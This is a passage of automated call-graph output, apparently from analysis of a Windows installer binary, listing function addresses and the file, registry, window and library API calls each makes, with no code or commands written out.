4838 40617e 5 API calls 4837->4838 4840 403332 4838->4840 4839 40333c 4839->4775 4840->4839 4841 405935 3 API calls 4840->4841 4842 403344 CreateDirectoryW 4841->4842 4943 405b85 4842->4943 4947 405b56 GetFileAttributesW CreateFileW 4845->4947 4847 402dff 4874 402e0c 4847->4874 4948 405eea lstrcpynW 4847->4948 4849 402e22 4850 405981 2 API calls 4849->4850 4851 402e28 4850->4851 4949 405eea lstrcpynW 4851->4949 4853 402e33 GetFileSize 4854 402f34 4853->4854 4872 402e4a 4853->4872 4855 402d1a 33 API calls 4854->4855 4857 402f3b 4855->4857 4856 4032f9 ReadFile 4856->4872 4859 402f77 GlobalAlloc 4857->4859 4857->4874 4951 40330f SetFilePointer 4857->4951 4858 402fcf 4861 402d1a 33 API calls 4858->4861 4860 402f8e 4859->4860 4865 405b85 2 API calls 4860->4865 4861->4874 4863 402f58 4866 4032f9 ReadFile 4863->4866 4864 402d1a 33 API calls 4864->4872 4868 402f9f CreateFileW 4865->4868 4867 402f63 4866->4867 4867->4859 4867->4874 4869 402fd9 4868->4869 4868->4874 4950 40330f SetFilePointer 4869->4950 4871 402fe7 4873 403062 46 API calls 4871->4873 4872->4854 4872->4856 4872->4858 4872->4864 4872->4874 4873->4874 4874->4783 4876 406254 3 API calls 4875->4876 4877 4038c8 4876->4877 4878 4038e0 4877->4878 4879 4038ce 4877->4879 4880 405db7 3 API calls 4878->4880 4961 405e31 wsprintfW 4879->4961 4881 403910 4880->4881 4883 40392f lstrcatW 4881->4883 4885 405db7 3 API calls 4881->4885 4884 4038de 4883->4884 4952 403b8a 4884->4952 4885->4883 4888 405a3d 18 API calls 4889 403961 4888->4889 4890 4039f5 4889->4890 4893 405db7 3 API calls 4889->4893 4891 405a3d 18 API calls 4890->4891 4892 4039fb 4891->4892 4895 403a0b LoadImageW 4892->4895 4896 405f0c 18 API calls 4892->4896 4894 403993 4893->4894 4894->4890 4899 4039b4 lstrlenW 4894->4899 4903 405962 CharNextW 4894->4903 4897 403ab1 4895->4897 4898 403a32 RegisterClassW 4895->4898 4896->4895 4902 40140b 2 API calls 4897->4902 4900 403abb 4898->4900 4901 403a68 SystemParametersInfoW CreateWindowExW 4898->4901 4904 4039c2 lstrcmpiW 4899->4904 4905 4039e8 4899->4905 4900->4786 4901->4897 4906 403ab7 4902->4906 4907 4039b1 4903->4907 4904->4905 4908 4039d2 GetFileAttributesW 4904->4908 4909 405935 3 API calls 4905->4909 4906->4900 4911 403b8a 19 API calls 4906->4911 4907->4899 4910 4039de 4908->4910 4912 4039ee 4909->4912 4910->4905 4913 405981 2 API calls 4910->4913 4914 403ac8 4911->4914 4962 405eea lstrcpynW 4912->4962 4913->4905 4916 403ad4 ShowWindow LoadLibraryW 4914->4916 4917 403b57 4914->4917 4919 403af3 LoadLibraryW 4916->4919 4920 403afa GetClassInfoW 4916->4920 4963 405267 OleInitialize 4917->4963 4919->4920 4921 403b24 DialogBoxParamW 4920->4921 4922 403b0e GetClassInfoW RegisterClassW 4920->4922 4924 40140b 2 API calls 4921->4924 4922->4921 4923 403b5d 4925 403b61 4923->4925 4926 403b79 4923->4926 4924->4900 4925->4900 4928 40140b 2 API calls 4925->4928 4927 40140b 2 API calls 4926->4927 4927->4900 4928->4900 4929->4773 4930->4818 4931->4789 4933 4037d3 CloseHandle 4932->4933 4934 4037dd 4932->4934 4933->4934 4935 4037f1 4934->4935 4936 4037e7 CloseHandle 4934->4936 4971 40381f 4935->4971 4936->4935 4939 405772 71 API calls 4940 403621 OleUninitialize 4939->4940 4940->4795 4940->4796 4941->4810 4942->4832 4944 405b92 GetTickCount GetTempFileNameW 4943->4944 4945 403358 4944->4945 4946 405bc8 4944->4946 4945->4775 4946->4944 4946->4945 4947->4847 4948->4849 4949->4853 4950->4871 4951->4863 4953 403b9e 4952->4953 4970 405e31 wsprintfW 4953->4970 4955 403c0f 4956 405f0c 18 API calls 4955->4956 4957 403c1b SetWindowTextW 4956->4957 4958 40393f 4957->4958 4959 403c37 4957->4959 4958->4888 4959->4958 4960 405f0c 18 API calls 4959->4960 4960->4959 4961->4884 4962->4890 4964 40417b SendMessageW 4963->4964 4965 40528a 4964->4965 4968 401389 2 API calls 4965->4968 4969 4052b1 4965->4969 4966 40417b SendMessageW 4967 4052c3 OleUninitialize 4966->4967 4967->4923 4968->4965 4969->4966 4970->4955 4972 40382d 4971->4972 4973 4037f6 4972->4973 4974 403832 FreeLibrary GlobalFree 4972->4974 4973->4939 4974->4973 4974->4974 5243 40155b 5244 40296d 5243->5244 5247 405e31 wsprintfW 5244->5247 5246 402972 5247->5246 3904 4023e0 3915 402c44 3904->3915 3906 4023ea 3919 402b3a 3906->3919 3909 402793 3910 4023fe RegQueryValueExW 3911 40241e 3910->3911 3914 402424 RegCloseKey 3910->3914 3911->3914 3925 405e31 wsprintfW 3911->3925 3914->3909 3916 402b3a 18 API calls 3915->3916 3917 402c5d 3916->3917 3918 402c6b RegOpenKeyExW 3917->3918 3918->3906 3920 402b46 3919->3920 3926 405f0c 3920->3926 3923 4023f3 3923->3909 3923->3910 3925->3914 3927 405f19 3926->3927 3928 406164 3927->3928 3931 405fcc GetVersion 3927->3931 3932 406132 lstrlenW 3927->3932 3934 405f0c 10 API calls 3927->3934 3937 406047 GetSystemDirectoryW 3927->3937 3938 40605a GetWindowsDirectoryW 3927->3938 3939 40617e 5 API calls 3927->3939 3940 405f0c 10 API calls 3927->3940 3941 4060d3 lstrcatW 3927->3941 3942 40608e SHGetSpecialFolderLocation 3927->3942 3953 405db7 RegOpenKeyExW 3927->3953 3958 405e31 wsprintfW 3927->3958 3959 405eea lstrcpynW 3927->3959 3929 402b67 3928->3929 3960 405eea lstrcpynW 3928->3960 3929->3923 3944 40617e 3929->3944 3931->3927 3932->3927 3934->3932 3937->3927 3938->3927 3939->3927 3940->3927 3941->3927 3942->3927 3943 4060a6 SHGetPathFromIDListW CoTaskMemFree 3942->3943 3943->3927 3945 40618b 3944->3945 3947 4061f4 CharNextW 3945->3947 3949 406201 3945->3949 3951 4061e0 CharNextW 3945->3951 3952 4061ef CharNextW 3945->3952 3961 405962 3945->3961 3946 406206 CharPrevW 3946->3949 3947->3945 3947->3949 3949->3946 3950 406227 3949->3950 3950->3923 3951->3945 3952->3947 3954 405e2b 3953->3954 3955 405deb RegQueryValueExW 3953->3955 3954->3927 3956 405e0c RegCloseKey 3955->3956 3956->3954 3958->3927 3959->3927 3960->3929 3962 405968 3961->3962 3963 40597e 3962->3963 3964 40596f CharNextW 3962->3964 3963->3945 3964->3962 5255 401ce5 GetDlgItem GetClientRect 5256 402b3a 18 API calls 5255->5256 5257 401d17 LoadImageW SendMessageW 5256->5257 5258 401d35 DeleteObject 5257->5258 5259 4029c7 5257->5259 5258->5259 5260 40206a 5261 402b3a 18 API calls 5260->5261 5262 402071 5261->5262 5263 402b3a 18 API calls 5262->5263 5264 40207b 5263->5264 5265 402b3a 18 API calls 5264->5265 5266 402084 5265->5266 5267 402b3a 18 API calls 5266->5267 5268 40208e 5267->5268 5269 402b3a 18 API calls 5268->5269 5270 402098 5269->5270 5271 4020ac CoCreateInstance 5270->5271 5272 402b3a 18 API calls 5270->5272 5275 4020cb 5271->5275 5272->5271 5273 401423 25 API calls 5274 402197 5273->5274 5275->5273 5275->5274 5276 40156b 5277 401584 5276->5277 5278 40157b ShowWindow 5276->5278 5279 401592 ShowWindow 5277->5279 5280 4029c7 5277->5280 5278->5277 5279->5280 5281 4024ee 5282 4024f3 5281->5282 5283 40250c 5281->5283 5284 402b1d 18 API calls 5282->5284 5285 402512 5283->5285 5286 40253e 5283->5286 5289 4024fa 5284->5289 5287 402b3a 18 API calls 5285->5287 5288 402b3a 18 API calls 5286->5288 5290 402519 WideCharToMultiByte lstrlenA 5287->5290 5291 402545 lstrlenW 5288->5291 5292 402567 WriteFile 5289->5292 5293 402793 5289->5293 5290->5289 5291->5289 5292->5293 5294 4018ef 5295 401926 5294->5295 5296 402b3a 18 API calls 5295->5296 5297 40192b 5296->5297 5298 405772 71 API calls 5297->5298 5299 401934 5298->5299 5300 402770 5301 402b3a 18 API calls 5300->5301 5302 402777 FindFirstFileW 5301->5302 5303 40278a 5302->5303 5304 40279f 5302->5304 5305 4027a8 5304->5305 5308 405e31 wsprintfW 5304->5308 5309 405eea lstrcpynW 5305->5309 5308->5305 5309->5303 5310 4014f1 SetForegroundWindow 5311 4029c7 5310->5311 5312 403872 5313 40387d 5312->5313 5314 403881 5313->5314 5315 403884 GlobalAlloc 5313->5315 5315->5314 5316 4018f2 5317 402b3a 18 API calls 5316->5317 5318 4018f9 5317->5318 5319 4056c6 MessageBoxIndirectW 5318->5319 5320 401902 5319->5320 5321 402573 5322 402b1d 18 API calls 5321->5322 5324 402582 5322->5324 5323 4026a0 5324->5323 5325 4025c8 ReadFile 5324->5325 5326 405bd9 ReadFile 5324->5326 5327 4026a2 5324->5327 5328 402608 MultiByteToWideChar 5324->5328 5330 4026b3 5324->5330 5331 40262e SetFilePointer MultiByteToWideChar 5324->5331 5325->5323 5325->5324 5326->5324 5333 405e31 wsprintfW 5327->5333 5328->5324 5330->5323 5332 4026d4 SetFilePointer 5330->5332 5331->5324 5332->5323 5333->5323 5334 401df3 5335 402b3a 18 API calls 5334->5335 5336 401df9 5335->5336 5337 402b3a 18 API calls 5336->5337 5338 401e02 5337->5338 5339 402b3a 18 API calls 5338->5339 5340 401e0b 5339->5340 5341 402b3a 18 API calls 5340->5341 5342 401e14 5341->5342 5343 401423 25 API calls 5342->5343 5344 401e1b ShellExecuteW 5343->5344 5345 401e4c 5344->5345 5365 4026f9 5366 402700 5365->5366 5369 402972 5365->5369 5367 402b1d 18 API calls 5366->5367 5368 40270b 5367->5368 5370 402712 SetFilePointer 5368->5370 5370->5369 5371 402722 5370->5371 5373 405e31 wsprintfW 5371->5373 5373->5369 5381 1000103d 5382 1000101b 8 API calls 5381->5382 5383 10001056 5382->5383 5384 40427d lstrlenW 5385 40429c 5384->5385 5386 40429e WideCharToMultiByte 5384->5386 5385->5386 5387 402c7f 5388 402c91 SetTimer 5387->5388 5389 402caa 5387->5389 5388->5389 5390 402cf8 5389->5390 5391 402cfe MulDiv 5389->5391 5392 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5391->5392 5392->5390 5394 4014ff 5395 401507 5394->5395 5397 40151a 5394->5397 5396 402b1d 18 API calls 5395->5396 5396->5397 5398 401000 5399 401037 BeginPaint GetClientRect 5398->5399 5402 40100c DefWindowProcW 5398->5402 5400 4010f3 5399->5400 5404 401073 CreateBrushIndirect FillRect DeleteObject 5400->5404 5405 4010fc 5400->5405 5403 401179 5402->5403 5404->5400 5406 401102 CreateFontIndirectW 5405->5406 5407 401167 EndPaint 5405->5407 5406->5407 5408 401112 6 API calls 5406->5408 5407->5403 5408->5407 5409 401a00 5410 402b3a 18 API calls 5409->5410 5411 401a09 ExpandEnvironmentStringsW 5410->5411 5412 401a30 5411->5412 5413 401a1d 5411->5413 5413->5412 5414 401a22 lstrcmpW 5413->5414 5414->5412 5415 401b01 5416 402b3a 18 API calls 5415->5416 5417 401b08 5416->5417 5418 402b1d 18 API calls 5417->5418 5419 401b11 wsprintfW 5418->5419 5420 4029c7 5419->5420 5421 100018c1 5422 10001243 3 API calls 5421->5422 5423 100018e7 5422->5423 5424 10001243 3 API calls 5423->5424 5425 100018ef 5424->5425 5426 10001243 3 API calls 5425->5426 5428 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5425->5428 5427 10001916 5426->5427 5429 1000191f GlobalFree 5427->5429 5430 10001280 2 API calls 5428->5430 5429->5428 5431 10001aad GlobalFree GlobalFree 5430->5431 5432 10002a43 5433 10002a5b 5432->5433 5434 100015a7 2 API calls 5433->5434 5435 10002a76 5434->5435 5436 404583 5437 404593 5436->5437 5438 4045b9 5436->5438 5439 40412f 19 API calls 5437->5439 5440 404196 8 API calls 5438->5440 5441 4045a0 SetDlgItemTextW 5439->5441 5442 4045c5 5440->5442 5441->5438 4146 405108 4147 405118 4146->4147 4148 40512c 4146->4148 4150 405175 4147->4150 4151 40511e 4147->4151 4149 405134 IsWindowVisible 4148->4149 4154 405154 4148->4154 4149->4150 4153 405141 4149->4153 4155 40517a CallWindowProcW 4150->4155 4160 40417b 4151->4160 4163 404a5e SendMessageW 4153->4163 4154->4155 4168 404ade 4154->4168 4156 405128 4155->4156 4161 404193 4160->4161 4162 404184 SendMessageW 4160->4162 4161->4156 4162->4161 4164 404a81 GetMessagePos ScreenToClient SendMessageW 4163->4164 4165 404abd SendMessageW 4163->4165 4166 404ab5 4164->4166 4167 404aba 4164->4167 4165->4166 4166->4154 4167->4165 4177 405eea lstrcpynW 4168->4177 4170 404af1 4178 405e31 wsprintfW 4170->4178 4172 404afb 4179 40140b 4172->4179 4176 404b0b 4176->4150 4177->4170 4178->4172 4183 401389 4179->4183 4182 405eea lstrcpynW 4182->4176 4185 401390 4183->4185 4184 4013fe 4184->4182 4185->4184 4186 4013cb MulDiv SendMessageW 4185->4186 4186->4185 5443 401f08 5444 402b3a 18 API calls 5443->5444 5445 401f0f GetFileVersionInfoSizeW 5444->5445 5446 401f36 GlobalAlloc 5445->5446 5447 401f8c 5445->5447 5446->5447 5448 401f4a GetFileVersionInfoW 5446->5448 5448->5447 5449 401f59 VerQueryValueW 5448->5449 5449->5447 5450 401f72 5449->5450 5454 405e31 wsprintfW 5450->5454 5452 401f7e 5455 405e31 wsprintfW 5452->5455 5454->5452 5455->5447 5463 1000224c 5464 100022b1 5463->5464 5465 100022e7 5463->5465 5464->5465 5466 100022c3 GlobalAlloc 5464->5466 5466->5464 5467 100016ce 5468 100016fd 5467->5468 5469 10001b3e 24 API calls 5468->5469 5470 10001704 5469->5470 5471 10001717 5470->5471 5472 1000170b 5470->5472 5474 10001721 5471->5474 5475 1000173e 5471->5475 5473 10001280 2 API calls 5472->5473 5478 10001715 5473->5478 5479 10001555 3 API calls 5474->5479 5476 10001744 5475->5476 5477 10001768 5475->5477 5480 100015cc 3 API calls 5476->5480 5481 10001555 3 API calls 5477->5481 5482 10001726 5479->5482 5483 10001749 5480->5483 5481->5478 5484 100015cc 3 API calls 5482->5484 5486 10001280 2 API calls 5483->5486 5485 1000172c 5484->5485 5487 10001280 2 API calls 5485->5487 5488 1000174f GlobalFree 5486->5488 5489 10001732 GlobalFree 5487->5489 5488->5478 5490 10001763 GlobalFree 5488->5490 5489->5478 5490->5478 4190 404b10 GetDlgItem GetDlgItem 4191 404b62 7 API calls 4190->4191 4194 404d7b 4190->4194 4192 404c05 DeleteObject 4191->4192 4193 404bf8 SendMessageW 4191->4193 4195 404c0e 4192->4195 4193->4192 4203 404e5f 4194->4203 4204 404e40 4194->4204 4208 404ddb 4194->4208 4196 404c45 4195->4196 4197 404c1d 4195->4197 4246 40412f 4196->4246 4200 405f0c 18 API calls 4197->4200 4199 404f0b 4205 404f15 SendMessageW 4199->4205 4206 404f1d 4199->4206 4207 404c27 SendMessageW SendMessageW 4200->4207 4201 404c59 4210 40412f 19 API calls 4201->4210 4202 4050f3 4259 404196 4202->4259 4203->4199 4203->4202 4211 404eb8 SendMessageW 4203->4211 4204->4203 4213 404e51 SendMessageW 4204->4213 4205->4206 4214 404f36 4206->4214 4215 404f2f ImageList_Destroy 4206->4215 4222 404f46 4206->4222 4207->4195 4209 404a5e 5 API calls 4208->4209 4227 404dec 4209->4227 4228 404c67 4210->4228 4211->4202 4217 404ecd SendMessageW 4211->4217 4213->4203 4219 404f3f GlobalFree 4214->4219 4214->4222 4215->4214 4216 4050b5 4216->4202 4223 4050c7 ShowWindow GetDlgItem ShowWindow 4216->4223 4221 404ee0 4217->4221 4219->4222 4220 404d3c GetWindowLongW SetWindowLongW 4224 404d55 4220->4224 4232 404ef1 SendMessageW 4221->4232 4222->4216 4236 404ade 4 API calls 4222->4236 4240 404f81 4222->4240 4223->4202 4225 404d73 4224->4225 4226 404d5b ShowWindow 4224->4226 4250 404164 SendMessageW 4225->4250 4249 404164 SendMessageW 4226->4249 4227->4204 4228->4220 4231 404cb7 SendMessageW 4228->4231 4233 404d36 4228->4233 4234 404cf3 SendMessageW 4228->4234 4235 404d04 SendMessageW 4228->4235 4231->4228 4232->4199 4233->4220 4233->4224 4234->4228 4235->4228 4236->4240 4237 404d6e 4237->4202 4238 40508b InvalidateRect 4238->4216 4239 4050a1 4238->4239 4251 404978 4239->4251 4241 404faf SendMessageW 4240->4241 4242 404fc5 4240->4242 4241->4242 4242->4238 4244 405026 4242->4244 4245 405039 SendMessageW SendMessageW 4242->4245 4244->4245 4245->4242 4247 405f0c 18 API calls 4246->4247 4248 40413a SetDlgItemTextW 4247->4248 4248->4201 4249->4237 4250->4194 4252 404995 4251->4252 4253 405f0c 18 API calls 4252->4253 4254 4049ca 4253->4254 4255 405f0c 18 API calls 4254->4255 4256 4049d5 4255->4256 4257 405f0c 18 API calls 4256->4257 4258 404a06 lstrlenW wsprintfW SetDlgItemTextW 4257->4258 4258->4216 4260 4041ae GetWindowLongW 4259->4260 4261 404237 4259->4261 4260->4261 4262 4041bf 4260->4262 4263 4041d1 4262->4263 4264 4041ce GetSysColor 4262->4264 4265 4041e1 SetBkMode 4263->4265 4266 4041d7 SetTextColor 4263->4266 4264->4263 4267 4041f9 GetSysColor 4265->4267 4268 4041ff 4265->4268 4266->4265 4267->4268 4269 404210 4268->4269 4270 404206 SetBkColor 4268->4270 4269->4261 4271 404223 DeleteObject 4269->4271 4272 40422a CreateBrushIndirect 4269->4272 4270->4269 4271->4272 4272->4261 5491 401491 5492 405194 25 API calls 5491->5492 5493 401498 5492->5493 5494 404912 5495 404922 5494->5495 5496 40493e 5494->5496 5505 4056aa GetDlgItemTextW 5495->5505 5498 404971 5496->5498 5499 404944 SHGetPathFromIDListW 5496->5499 5501 40495b SendMessageW 5499->5501 5502 404954 5499->5502 5500 40492f SendMessageW 5500->5496 5501->5498 5503 40140b 2 API calls 5502->5503 5503->5501 5505->5500 4457 402295 4458 402b3a 18 API calls 4457->4458 4459 4022a4 4458->4459 4460 402b3a 18 API calls 4459->4460 4461 4022ad 4460->4461 4462 402b3a 18 API calls 4461->4462 4463 4022b7 GetPrivateProfileStringW 4462->4463 4546 401f98 4547 40205c 4546->4547 4548 401faa 4546->4548 4551 401423 25 API calls 4547->4551 4549 402b3a 18 API calls 4548->4549 4550 401fb1 4549->4550 4552 402b3a 18 API calls 4550->4552 4556 402197 4551->4556 4553 401fba 4552->4553 4554 401fd0 LoadLibraryExW 4553->4554 4555 401fc2 GetModuleHandleW 4553->4555 4554->4547 4557 401fe1 4554->4557 4555->4554 4555->4557 4569 4062c0 WideCharToMultiByte 4557->4569 4560 401ff2 4563 402011 4560->4563 4564 401ffa 4560->4564 4561 40202b 4562 405194 25 API calls 4561->4562 4566 402002 4562->4566 4572 10001771 4563->4572 4614 401423 4564->4614 4566->4556 4567 40204e FreeLibrary 4566->4567 4567->4556 4570 4062ea GetProcAddress 4569->4570 4571 401fec 4569->4571 4570->4571 4571->4560 4571->4561 4573 100017a1 4572->4573 4617 10001b3e 4573->4617 4575 100017a8 4576 100018be 4575->4576 4577 100017c0 4575->4577 4578 100017b9 4575->4578 4576->4566 4651 100022eb 4577->4651 4669 100022a1 4578->4669 4583 10001824 4587 10001866 4583->4587 4588 1000182a 4583->4588 4584 10001806 4682 1000248d 4584->4682 4585 100017d6 4590 100017dc 4585->4590 4591 100017e7 4585->4591 4586 100017ef 4598 100017e5 4586->4598 4679 10002b23 4586->4679 4595 1000248d 10 API calls 4587->4595 4593 100015cc 3 API calls 4588->4593 4590->4598 4663 10002868 4590->4663 4673 1000260b 4591->4673 4600 10001840 4593->4600 4601 10001858 4595->4601 4598->4583 4598->4584 4604 1000248d 10 API calls 4600->4604 4613 100018ad 4601->4613 4705 10002450 4601->4705 4603 100017ed 4603->4598 4604->4601 4607 100018b7 GlobalFree 4607->4576 4610 10001899 4610->4613 4709 10001555 wsprintfW 4610->4709 4611 10001892 FreeLibrary 4611->4610 4613->4576 4613->4607 4615 405194 25 API calls 4614->4615 4616 401431 4615->4616 4616->4566 4712 1000121b GlobalAlloc 4617->4712 4619 10001b62 4713 1000121b GlobalAlloc 4619->4713 4621 10001b6d 4714 10001243 4621->4714 4623 10001da0 GlobalFree GlobalFree GlobalFree 4624 10001dbd 4623->4624 4638 10001e07 4623->4638 4625 1000210d 4624->4625 4633 10001dd2 4624->4633 4624->4638 4627 1000212f GetModuleHandleW 4625->4627 4625->4638 4626 10001c43 GlobalAlloc 4648 10001b75 4626->4648 4628 10002140 LoadLibraryW 4627->4628 4629 10002155 4627->4629 4628->4629 4628->4638 4725 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4629->4725 4630 10001c8e lstrcpyW 4634 10001c98 lstrcpyW 4630->4634 4631 10001cac GlobalFree 4631->4648 4633->4638 4721 1000122c 4633->4721 4634->4648 4635 100021a7 4637 100021b4 lstrlenW 4635->4637 4635->4638 4726 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4637->4726 4638->4575 4639 10002167 4639->4635 4650 10002191 GetProcAddress 4639->4650 4640 10002067 4640->4638 4643 100020af lstrcpyW 4640->4643 4643->4638 4644 10001cea 4644->4648 4719 100015a7 GlobalSize GlobalAlloc 4644->4719 4645 10001f56 GlobalFree 4645->4648 4646 100021ce 4646->4638 4648->4623 4648->4626 4648->4630 4648->4631 4648->4634 4648->4638 4648->4640 4648->4644 4648->4645 4649 1000122c 2 API calls 4648->4649 4724 1000121b GlobalAlloc 4648->4724 4649->4648 4650->4635 4659 10002303 4651->4659 4652 1000122c GlobalAlloc lstrcpynW 4652->4659 4653 10001243 3 API calls 4653->4659 4655 10002419 GlobalFree 4656 100017c6 4655->4656 4655->4659 4656->4585 4656->4586 4656->4598 4657 100023d5 GlobalAlloc WideCharToMultiByte 4657->4655 4658 100023ae GlobalAlloc CLSIDFromString 4658->4655 4659->4652 4659->4653 4659->4655 4659->4657 4659->4658 4660 10002390 lstrlenW 4659->4660 4729 100012c8 4659->4729 4660->4655 4662 1000239b 4660->4662 4662->4655 4734 1000259f 4662->4734 4665 1000287a 4663->4665 4664 1000291f ReadFile 4666 1000293d 4664->4666 4665->4664 4667 10002a39 4666->4667 4668 10002a2e GetLastError 4666->4668 4667->4598 4668->4667 4670 100022b1 4669->4670 4672 100017bf 4669->4672 4671 100022c3 GlobalAlloc 4670->4671 4670->4672 4671->4670 4672->4577 4677 10002627 4673->4677 4674 10002678 GlobalAlloc 4678 1000269a 4674->4678 4675 1000268b 4676 10002690 GlobalSize 4675->4676 4675->4678 4676->4678 4677->4674 4677->4675 4678->4603 4680 10002b2e 4679->4680 4681 10002b6e GlobalFree 4680->4681 4686 100024ad 4682->4686 4684 100024db wsprintfW 4684->4686 4685 10002581 GlobalFree 4685->4686 4689 1000180c 4685->4689 4686->4684 4686->4685 4687 10002558 GlobalFree 4686->4687 4688 1000250e MultiByteToWideChar 4686->4688 4690 100024fd lstrcpynW 4686->4690 4691 100024ec StringFromGUID2 4686->4691 4692 10001280 2 API calls 4686->4692 4737 1000121b GlobalAlloc 4686->4737 4738 100012f3 4686->4738 4687->4686 4688->4686 4694 100015cc 4689->4694 4690->4686 4691->4686 4692->4686 4742 1000121b GlobalAlloc 4694->4742 4696 100015d2 4697 100015df lstrcpyW 4696->4697 4699 100015f9 4696->4699 4700 10001613 4697->4700 4699->4700 4701 100015fe wsprintfW 4699->4701 4702 10001280 4700->4702 4701->4700 4703 100012c3 GlobalFree 4702->4703 4704 10001289 GlobalAlloc lstrcpynW 4702->4704 4703->4601 4704->4703 4706 1000245e 4705->4706 4708 10001879 4705->4708 4707 1000247a GlobalFree 4706->4707 4706->4708 4707->4706 4708->4610 4708->4611 4710 10001280 2 API calls 4709->4710 4711 10001576 4710->4711 4711->4613 4712->4619 4713->4621 4715 1000127c 4714->4715 4716 1000124d 4714->4716 4715->4648 4716->4715 4727 1000121b GlobalAlloc 4716->4727 4718 10001259 lstrcpyW GlobalFree 4718->4648 4720 100015c5 4719->4720 4720->4644 4728 1000121b GlobalAlloc 4721->4728 4723 1000123b lstrcpynW 4723->4638 4724->4648 4725->4639 4726->4646 4727->4718 4728->4723 4730 100012ee 4729->4730 4731 100012d0 4729->4731 4730->4730 4731->4730 4732 1000122c 2 API calls 4731->4732 4733 100012ec 4732->4733 4733->4659 4735 10002603 4734->4735 4736 100025ad VirtualAlloc 4734->4736 4735->4662 4736->4735 4737->4686 4739 10001324 4738->4739 4740 100012fc 4738->4740 4739->4686 4740->4739 4741 10001308 lstrcpyW 4740->4741 4741->4739 4742->4696 5506 10001058 5507 10001243 3 API calls 5506->5507 5509 10001074 5507->5509 5508 100010dd 5509->5508 5510 1000152e 4 API calls 5509->5510 5511 10001092 5509->5511 5510->5511 5512 1000152e 4 API calls 5511->5512 5513 100010a2 5512->5513 5514 100010b2 5513->5514 5515 100010a9 GlobalSize 5513->5515 5516 100010b6 GlobalAlloc 5514->5516 5517 100010c7 5514->5517 5515->5514 5518 10001555 3 API calls 5516->5518 5519 100010d2 GlobalFree 5517->5519 5518->5517 5519->5508 5520 401718 5521 402b3a 18 API calls 5520->5521 5522 40171f SearchPathW 5521->5522 5523 40173a 5522->5523 4975 40159b 4976 402b3a 18 API calls 4975->4976 4977 4015a2 SetFileAttributesW 4976->4977 4978 4015b4 4977->4978 5524 40149e 5525 4014ac PostQuitMessage 5524->5525 5526 40223e 5524->5526 5525->5526 5527 4021a0 5528 402b3a 18 API calls 5527->5528 5529 4021a6 5528->5529 5530 402b3a 18 API calls 5529->5530 5531 4021af 5530->5531 5532 402b3a 18 API calls 5531->5532 5533 4021b8 5532->5533 5534 40622d 2 API calls 5533->5534 5535 4021c1 5534->5535 5536 4021d2 lstrlenW lstrlenW 5535->5536 5537 4021c5 5535->5537 5539 405194 25 API calls 5536->5539 5538 405194 25 API calls 5537->5538 5541 4021cd 5537->5541 5538->5541 5540 402210 SHFileOperationW 5539->5540 5540->5537 5540->5541 5542 100010e1 5543 10001111 5542->5543 5544 10001243 3 API calls 5543->5544 5554 10001121 5544->5554 5545 100011d8 GlobalFree 5546 100012c8 2 API calls 5546->5554 5547 100011d3 5547->5545 5548 10001243 3 API calls 5548->5554 5549 10001280 2 API calls 5552 100011c4 GlobalFree 5549->5552 5550 10001164 GlobalAlloc 5550->5554 5551 100011f8 GlobalFree 5551->5554 5552->5554 5553 100012f3 lstrcpyW 5553->5554 5554->5545 5554->5546 5554->5547 5554->5548 5554->5549 5554->5550 5554->5551 5554->5552 5554->5553 3965 401b22 3966 401b73 3965->3966 3967 401b2f 3965->3967 3968 401b78 3966->3968 3969 401b9d GlobalAlloc 3966->3969 3972 401b46 3967->3972 3974 401bb8 3967->3974 3977 40223e 3968->3977 3986 405eea lstrcpynW 3968->3986 3971 405f0c 18 API calls 3969->3971 3970 405f0c 18 API calls 3976 402238 3970->3976 3971->3974 3984 405eea lstrcpynW 3972->3984 3974->3970 3974->3977 3987 4056c6 3976->3987 3978 401b8a GlobalFree 3978->3977 3979 401b55 3985 405eea lstrcpynW 3979->3985 3982 401b64 3991 405eea lstrcpynW 3982->3991 3984->3979 3985->3982 3986->3978 3988 4056db 3987->3988 3989 405727 3988->3989 3990 4056ef MessageBoxIndirectW 3988->3990 3989->3977 3990->3989 3991->3977 5555 4029a2 SendMessageW 5556 4029bc InvalidateRect 5555->5556 5557 4029c7 5555->5557 5556->5557 3992 401924 3993 401926 3992->3993 3994 402b3a 18 API calls 3993->3994 3995 40192b 3994->3995 3998 405772 3995->3998 4037 405a3d 3998->4037 4001 4057b1 4008 4058d1 4001->4008 4051 405eea lstrcpynW 4001->4051 4002 40579a DeleteFileW 4003 401934 4002->4003 4005 4057d7 4006 4057ea 4005->4006 4007 4057dd lstrcatW 4005->4007 4052 405981 lstrlenW 4006->4052 4009 4057f0 4007->4009 4008->4003 4081 40622d FindFirstFileW 4008->4081 4012 405800 lstrcatW 4009->4012 4015 40580b lstrlenW FindFirstFileW 4009->4015 4012->4015 4014 4058fa 4084 405935 lstrlenW CharPrevW 4014->4084 4015->4008 4022 40582d 4015->4022 4018 4058b4 FindNextFileW 4018->4022 4023 4058ca FindClose 4018->4023 4019 40572a 5 API calls 4021 40590c 4019->4021 4024 405910 4021->4024 4025 405926 4021->4025 4022->4018 4033 405875 4022->4033 4056 405eea lstrcpynW 4022->4056 4023->4008 4024->4003 4028 405194 25 API calls 4024->4028 4027 405194 25 API calls 4025->4027 4027->4003 4030 40591d 4028->4030 4029 405772 64 API calls 4029->4033 4032 405d84 40 API calls 4030->4032 4031 405194 25 API calls 4031->4018 4034 405924 4032->4034 4033->4018 4033->4029 4033->4031 4057 40572a 4033->4057 4065 405194 4033->4065 4076 405d84 4033->4076 4034->4003 4087 405eea lstrcpynW 4037->4087 4039 405a4e 4088 4059e0 CharNextW CharNextW 4039->4088 4042 405792 4042->4001 4042->4002 4043 40617e 5 API calls 4049 405a64 4043->4049 4044 405a95 lstrlenW 4045 405aa0 4044->4045 4044->4049 4047 405935 3 API calls 4045->4047 4046 40622d 2 API calls 4046->4049 4048 405aa5 GetFileAttributesW 4047->4048 4048->4042 4049->4042 4049->4044 4049->4046 4050 405981 2 API calls 4049->4050 4050->4044 4051->4005 4053 40598f 4052->4053 4054 4059a1 4053->4054 4055 405995 CharPrevW 4053->4055 4054->4009 4055->4053 4055->4054 4056->4022 4094 405b31 GetFileAttributesW 4057->4094 4060 405745 RemoveDirectoryW 4063 405753 4060->4063 4061 40574d DeleteFileW 4061->4063 4062 405757 4062->4033 4063->4062 4064 405763 SetFileAttributesW 4063->4064 4064->4062 4066 405251 